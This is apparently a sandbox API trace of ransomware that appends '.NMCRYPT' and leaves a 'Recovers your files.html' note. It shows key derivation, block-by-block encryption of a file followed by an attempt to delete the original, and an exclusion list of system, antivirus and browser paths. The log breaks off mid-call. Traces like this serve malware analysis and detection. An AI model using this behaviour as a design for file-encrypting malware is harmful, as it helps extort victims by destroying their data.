[0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.689] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.689] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.689] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.689] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0147.689] CryptHashData (hHash=0x9ad438, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.689] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad2b8) returned 1 [0147.689] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.689] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0147.689] wcslen (_String="\\\\?\\") returned 0x4 [0147.689] CryptDuplicateKey (in: hKey=0x9ad2b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad2f8) returned 1 [0147.690] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.695] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.696] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2580) returned 1 [0147.696] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.696] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.697] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.697] GetLastError () returned 0x0 [0147.697] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.740] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.741] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.741] GetLastError () returned 0x0 [0147.741] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.741] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.741] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.741] GetLastError () returned 0x0 [0147.741] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.741] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.741] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.741] GetLastError () returned 0x0 [0147.741] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.741] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.741] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.741] GetLastError () returned 0x0 [0147.741] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.741] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.741] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.741] GetLastError () returned 0x0 [0147.741] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.741] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.741] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.741] GetLastError () returned 0x0 [0147.741] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.741] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.742] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.742] GetLastError () returned 0x0 [0147.742] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.742] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.742] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.742] GetLastError () returned 0x0 [0147.742] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.742] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.742] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.742] GetLastError () returned 0x0 [0147.742] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.742] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x14, lpOverlapped=0x0) returned 1 [0147.742] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x14, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x20) returned 1 [0147.742] GetLastError () returned 0x0 [0147.742] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x20, lpOverlapped=0x0) returned 1 [0147.742] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.742] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.742] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml")) returned 0x20 [0147.743] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml", dwFileAttributes=0x20) returned 0 [0147.743] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 1 [0147.743] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml")) returned 0 [0147.743] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" [0147.743] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.743] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB410.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb410.tmp")) returned 0xb410 [0147.744] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB410.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb410.tmp"), dwFlags=0x1) returned 0 [0147.744] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB410.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb410.tmp")) returned 1 [0147.744] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0147.744] wcslen (_String="OK") returned 0x2 [0147.744] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.744] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.744] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0147.744] CryptDestroyHash (hHash=0x9ad438) returned 1 [0147.744] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0147.744] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.744] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*NMCRYPT") returned 0 [0147.744] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*Recovers your files.html") returned 0 [0147.744] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*.exe") returned 0 [0147.744] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*.dll") returned 0 [0147.744] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*.lnk") returned 0 [0147.744] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*.bat") returned 0 [0147.744] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*.ini") returned 0 [0147.744] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*.msi") returned 0 [0147.744] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*.scf") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*pagefile.sys*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*AppData*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*\\winrar\\*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*\\java\\*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*\\windows\\*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*\\ESET\\*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*\\AVG\\*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*Atheros*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*Realtek*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*bootmgr*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*boot*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*boot*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*IO.SYS*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*ntldr*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*chrome*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*opera*") returned 0 [0147.745] PathMatchSpecW (pszFile="ipsplk.xml", pszSpec="*firefox*") returned 0 [0147.745] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml", pszSpec="*") returned 1 [0147.745] strlen (_Str="NMoreira") returned 0x8 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 